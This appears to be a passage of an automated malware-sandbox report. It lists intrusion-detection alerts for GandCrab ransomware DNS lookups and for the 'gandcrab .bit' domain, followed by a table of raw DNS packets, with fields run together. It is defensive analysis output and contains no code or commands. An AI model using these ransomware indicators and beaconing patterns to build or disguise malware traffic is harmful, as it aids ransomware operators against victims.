                                    192.168.2.38.8.8.864126532829498 09/01/22-00:02:44.367092UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16412653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.856045532829500 09/01/22-00:01:38.479108UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35604553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.849876532829500 09/01/22-00:02:36.017097UDP2829500ETPRO TROJAN GandCrab DNS Lookup 34987653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853430532829498 09/01/22-00:02:18.389778UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15343053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864275532829498 09/01/22-00:03:00.076893UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16427553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.852746532026737 09/01/22-00:03:24.060420UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5274653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865199532829500 09/01/22-00:02:04.790776UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36519953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.855643532829498 09/01/22-00:01:41.349610UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15564353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865322532026737 09/01/22-00:01:43.838373UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6532253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857389532829500 09/01/22-00:02:53.228134UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35738953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.852457532026737 09/01/22-00:03:02.822494UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5245753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859766532026737 09/01/22-00:03:34.053456UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5976653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.850094532026737 09/01/22-00:03:38.722516UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5009453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.863689532829498 09/01/22-00:03:21.642301UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16368953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864828532829500 09/01/22-00:02:24.814616UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36482853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.862427532026737 09/01/22-00:03:13.168037UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6242753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.858485532829500 09/01/22-00:03:30.012594UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35848553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860586532026737 09/01/22-00:01:27.526553UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6058653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860648532829498 09/01/22-00:03:25.320562UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16064853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.850231532026737 09/01/22-00:02:54.755739UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5023153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859831532829500 09/01/22-00:02:55.995864UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35983153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857138532829498 09/01/22-00:01:34.214783UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15713853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865465532829500 09/01/22-00:03:37.351949UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36546553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859641532026737 09/01/22-00:01:39.990388UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5964153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859638532026737 09/01/22-00:01:39.931325UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5963853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.854435532829498 09/01/22-00:03:36.023381UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15443553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860818532829500 09/01/22-00:03:08.745097UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36081853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857576532829498 09/01/22-00:01:53.290249UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15757653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.849171532829500 09/01/22-00:02:32.489443UDP2829500ETPRO TROJAN GandCrab DNS Lookup 34917153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.851144532829498 09/01/22-00:01:24.145242UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15114453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.852115532026737 09/01/22-00:03:20.348262UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5211553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.856620532026737 09/01/22-00:02:49.146584UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5662053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.851109532829500 09/01/22-00:03:01.665772UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35110953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864379532829500 09/01/22-00:03:19.992460UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36437953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864599532829498 09/01/22-00:02:22.089885UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16459953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860821532829500 09/01/22-00:03:08.846909UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36082153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.849205532026737 09/01/22-00:02:46.696702UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)4920553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.849878532829500 09/01/22-00:02:36.053729UDP2829500ETPRO TROJAN GandCrab DNS Lookup 34987853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853846532829498 09/01/22-00:01:59.423880UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15384653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860091532829500 09/01/22-00:02:16.509694UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36009153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859377532829500 09/01/22-00:02:48.283085UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35937753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859824532026737 09/01/22-00:02:19.994370UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5982453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864607532829500 09/01/22-00:02:41.921899UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36460753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.855249532829498 09/01/22-00:03:03.506251UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15524953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864380532829500 09/01/22-00:03:20.011368UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36438053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.850092532026737 09/01/22-00:03:38.678470UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5009253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853272532829498 09/01/22-00:02:55.282821UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15327253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857392532829500 09/01/22-00:02:53.296910UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35739253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.858916532829500 09/01/22-00:03:18.060823UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35891653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853053532829498 09/01/22-00:02:15.057233UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15305353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864826532829500 09/01/22-00:02:24.770961UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36482653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853625532026737 09/01/22-00:02:01.788642UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5362553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.851596532026737 09/01/22-00:03:26.954769UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5159653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.862435532026737 09/01/22-00:02:57.512287UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6243553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853852532026737 09/01/22-00:01:50.489647UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5385253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.862429532026737 09/01/22-00:03:13.209944UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6242953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860584532026737 09/01/22-00:01:27.482735UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6058453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864124532829498 09/01/22-00:02:44.327136UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16412453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.861189532829498 09/01/22-00:02:52.764321UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16118953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.849168532829500 09/01/22-00:02:32.423642UDP2829500ETPRO TROJAN GandCrab DNS Lookup 34916853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.863451532829498 09/01/22-00:02:35.516825UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16345153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.850625532026737 09/01/22-00:03:18.697259UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5062553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.854286532829500 09/01/22-00:03:33.715891UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35428653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860769532829498 09/01/22-00:01:45.451637UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16076953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.852744532026737 09/01/22-00:03:24.019183UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5274453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.855641532829498 09/01/22-00:01:41.302395UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15564153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853469532829500 09/01/22-00:02:00.624524UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35346953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860770532829498 09/01/22-00:01:45.473540UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16077053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853470532829500 09/01/22-00:02:00.646017UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35347053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865324532026737 09/01/22-00:01:43.883100UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6532453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853851532026737 09/01/22-00:01:50.267332UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5385153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.862433532026737 09/01/22-00:02:57.467935UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6243353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859584532026737 09/01/22-00:02:11.726579UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5958453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860475532829498 09/01/22-00:02:47.139274UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16047553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864123532829498 09/01/22-00:02:44.306860UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16412353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.858483532829500 09/01/22-00:03:29.383909UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35848353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.856618532026737 09/01/22-00:02:49.105935UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5661853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.855247532829498 09/01/22-00:03:03.466197UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15524753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.861362532829498 09/01/22-00:03:28.520063UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16136253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.861129532829498 09/01/22-00:03:15.922110UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16112953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857574532829498 09/01/22-00:01:53.251460UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15757453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864597532829498 09/01/22-00:02:22.051454UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16459753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.858303532026737 09/01/22-00:02:34.435886UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5830353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865387532026737 09/01/22-00:02:38.660218UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6538753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853274532829498 09/01/22-00:02:55.325848UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15327453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.851594532026737 09/01/22-00:03:26.907030UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5159453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.863565532026737 09/01/22-00:02:17.049623UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6356553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.850627532026737 09/01/22-00:03:18.737468UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5062753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.858124532829498 09/01/22-00:02:27.993076UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15812453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.850786532026737 09/01/22-00:02:43.346779UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5078653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.850233532026737 09/01/22-00:02:54.805593UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5023353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.854287532829500 09/01/22-00:03:33.736226UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35428753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864605532829500 09/01/22-00:02:41.882665UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36460553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864604532829500 09/01/22-00:02:41.862105UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36460453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.855246532829498 09/01/22-00:03:03.448041UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15524653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.855953532829500 09/01/22-00:03:25.594151UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35595353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.858484532829500 09/01/22-00:03:29.402067UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35848453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857139532829498 09/01/22-00:01:34.235761UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15713953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859435532026737 09/01/22-00:01:57.617695UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5943553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.863564532026737 09/01/22-00:02:17.026690UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6356453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.852958532829500 09/01/22-00:01:25.347118UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35295853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860092532829500 09/01/22-00:02:16.532570UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36009253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.863690532829498 09/01/22-00:03:21.664385UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16369053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.858304532026737 09/01/22-00:02:34.463044UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5830453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.855459532829498 09/01/22-00:03:07.276022UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15545953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860476532829498 09/01/22-00:02:47.160135UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16047653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865110532829500 09/01/22-00:01:46.934130UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36511053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.863449532829498 09/01/22-00:02:35.476503UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16344953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.852960532829500 09/01/22-00:01:25.385522UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35296053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857390532829500 09/01/22-00:02:53.250639UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35739053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857573532829498 09/01/22-00:01:53.226527UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15757353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.865514532829500 09/01/22-00:02:19.450712UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36551453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.861131532829498 09/01/22-00:03:15.960645UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16113153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.851141532829498 09/01/22-00:01:24.068248UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15114153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853052532829498 09/01/22-00:02:15.036327UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15305253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.861128532829498 09/01/22-00:03:15.903464UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16112853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.852745532026737 09/01/22-00:03:24.040007UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5274553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.854156532829498 09/01/22-00:02:39.730598UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15415653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857709532829500 09/01/22-00:01:42.750967UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35770953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.861363532829498 09/01/22-00:03:28.538480UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16136353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853308532829500 09/01/22-00:01:54.898418UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35330853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860585532026737 09/01/22-00:01:27.503002UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)6058553192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860771532829498 09/01/22-00:01:45.495695UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16077153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860422532829498 09/01/22-00:03:32.403375UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16042253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.850093532026737 09/01/22-00:03:38.699985UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5009353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853041532026737 09/01/22-00:03:06.319112UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5304153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.851994532026737 09/01/22-00:02:26.273853UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5199453192.168.2.38.8.8.8
                                    192.168.2.38.8.8.858917532829500 09/01/22-00:03:18.082512UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35891753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864827532829500 09/01/22-00:02:24.792802UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36482753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.860820532829500 09/01/22-00:03:08.828384UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36082053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.851997532026737 09/01/22-00:02:26.333413UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5199753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.861188532829498 09/01/22-00:02:52.691629UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16118853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859832532829500 09/01/22-00:02:56.017085UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35983253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864600532829498 09/01/22-00:02:22.108885UDP2829498ETPRO TROJAN GandCrab DNS Lookup 16460053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.855640532829498 09/01/22-00:01:41.280696UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15564053192.168.2.38.8.8.8
                                    192.168.2.38.8.8.855462532829498 09/01/22-00:03:07.346617UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15546253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859639532026737 09/01/22-00:01:39.951734UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5963953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.855653532829498 09/01/22-00:03:19.277165UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15565353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.857826532829500 09/01/22-00:03:22.956962UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35782653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853847532829498 09/01/22-00:01:59.444336UDP2829498ETPRO TROJAN GandCrab DNS Lookup 15384753192.168.2.38.8.8.8
                                    192.168.2.38.8.8.851108532829500 09/01/22-00:03:01.644612UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35110853192.168.2.38.8.8.8
                                    192.168.2.38.8.8.852459532026737 09/01/22-00:03:02.900983UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5245953192.168.2.38.8.8.8
                                    192.168.2.38.8.8.864381532829500 09/01/22-00:03:20.034172UDP2829500ETPRO TROJAN GandCrab DNS Lookup 36438153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.853626532026737 09/01/22-00:02:01.814516UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5362653192.168.2.38.8.8.8
                                    192.168.2.38.8.8.859823532026737 09/01/22-00:02:19.973756UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5982353192.168.2.38.8.8.8
                                    192.168.2.38.8.8.851892532026737 09/01/22-00:03:31.996527UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5189253192.168.2.38.8.8.8
                                    192.168.2.38.8.8.856621532026737 09/01/22-00:02:49.211680UDP2026737ET TROJAN Observed GandCrab Domain (gandcrab .bit)5662153192.168.2.38.8.8.8
                                    192.168.2.38.8.8.855956532829500 09/01/22-00:03:25.650230UDP2829500ETPRO TROJAN GandCrab DNS Lookup 35595653192.168.2.38.8.8.8
                                    TimestampSource PortDest PortSource IPDest IP
                                    Sep 1, 2022 00:01:23.064902067 CEST5397553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:23.084820032 CEST53539758.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:23.994477034 CEST5113953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:24.030497074 CEST53511398.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:24.049179077 CEST5114053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:24.067482948 CEST53511408.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:24.068248034 CEST5114153192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:24.088715076 CEST53511418.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:24.090037107 CEST5114253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:24.110754013 CEST53511428.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:24.124614954 CEST5114353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:24.144764900 CEST53511438.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:24.145241976 CEST5114453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:24.164725065 CEST53511448.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:25.247797012 CEST5295553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:25.283262014 CEST53529558.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:25.310718060 CEST5295653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:25.327796936 CEST53529568.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:25.328521967 CEST5295753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:25.346643925 CEST53529578.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:25.347117901 CEST5295853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:25.366964102 CEST53529588.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:25.367458105 CEST5295953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:25.385024071 CEST53529598.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:25.385521889 CEST5296053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:25.405503035 CEST53529608.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:26.844472885 CEST6058253192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:27.449457884 CEST53605828.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:27.464441061 CEST6058353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:27.481861115 CEST53605838.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:27.482734919 CEST6058453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:27.502418995 CEST53605848.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:27.503001928 CEST6058553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:27.520689964 CEST53605858.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:27.526552916 CEST6058653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:27.550129890 CEST53605868.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:27.550731897 CEST6058753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:27.573137045 CEST53605878.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:33.534245014 CEST5713453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:34.108952045 CEST53571348.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:34.150069952 CEST5713553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:34.169861078 CEST53571358.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:34.170593023 CEST5713653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:34.192428112 CEST53571368.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:34.192981005 CEST5713753192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:34.214257956 CEST53571378.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:34.214782953 CEST5713853192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:34.234899998 CEST53571388.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:34.235760927 CEST5713953192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:34.256675959 CEST53571398.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:35.764401913 CEST6205053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:36.800379992 CEST6205053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:37.845704079 CEST6205053192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:38.424983025 CEST53620508.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:38.440474033 CEST5604353192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:38.459913969 CEST53560438.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:38.460692883 CEST5604453192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:38.478588104 CEST53560448.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:38.479108095 CEST5604553192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:38.499536037 CEST53560458.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:38.500366926 CEST5604653192.168.2.38.8.8.8
                                    Sep 1, 2022 00:01:38.522388935 CEST53560468.8.8.8192.168.2.3
                                    Sep 1, 2022 00:01:38.529181004 CEST5604753192.168.2.38.8.8.8
